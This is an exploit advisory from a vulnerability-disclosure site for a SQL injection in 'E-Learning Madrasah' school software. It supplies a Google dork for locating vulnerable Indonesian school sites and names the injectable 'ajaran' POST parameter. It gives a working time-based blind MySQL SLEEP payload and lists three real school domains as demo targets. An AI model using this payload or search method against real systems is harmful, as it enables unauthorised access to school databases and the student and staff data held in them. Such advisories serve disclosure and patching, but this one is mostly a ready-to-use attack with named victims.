E-Learning Madrasah - SQL Injection Vulnerabilities

2020.09.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

########################################################## # Exploit Title: E-Learning Madrasah - SQL Injection Vulnerabilities # Date: 2020/09/23 # Discovered By: Gh05t666nero # Team: Indoghostsec # Vendor Homepage: elearning.kemenag.go.id # Version: All Version # Tested on: Linux #1 SMP Debian 5.7.6-1kali2 (2020-07-01) ########################################################## [*] Dork: ======= intitle:E-Learning.Madrasah site:sch.id ########################################################## [*] Vulnerable parameters: ===================== ajaran=2020[SQL-I]&username=1&password=123456 ########################################################## [*] Exploit: ======== --- Parameter: ajaran (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ajaran=2020' AND (SELECT 4252 FROM (SELECT(SLEEP(5)))Ihai) AND 'vDBL'='vDBL&username=1&password=123456 --- ########################################################## [*] Demo: ======= http://mankapuas.sch.id/elearning http://elearning.man1jember.sch.id http://elearning.mtsn2kotamagelang.sch.id ########################################################## Telegram : https://t.me/Gh05t666nero Instagram: https://www.instagram.com/ojan_cxs/ Twitter : https://twitter.com/Gh05t666nero1 Greet'z: All member IndoGhostSec

References:

https://anonsec.my.id


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top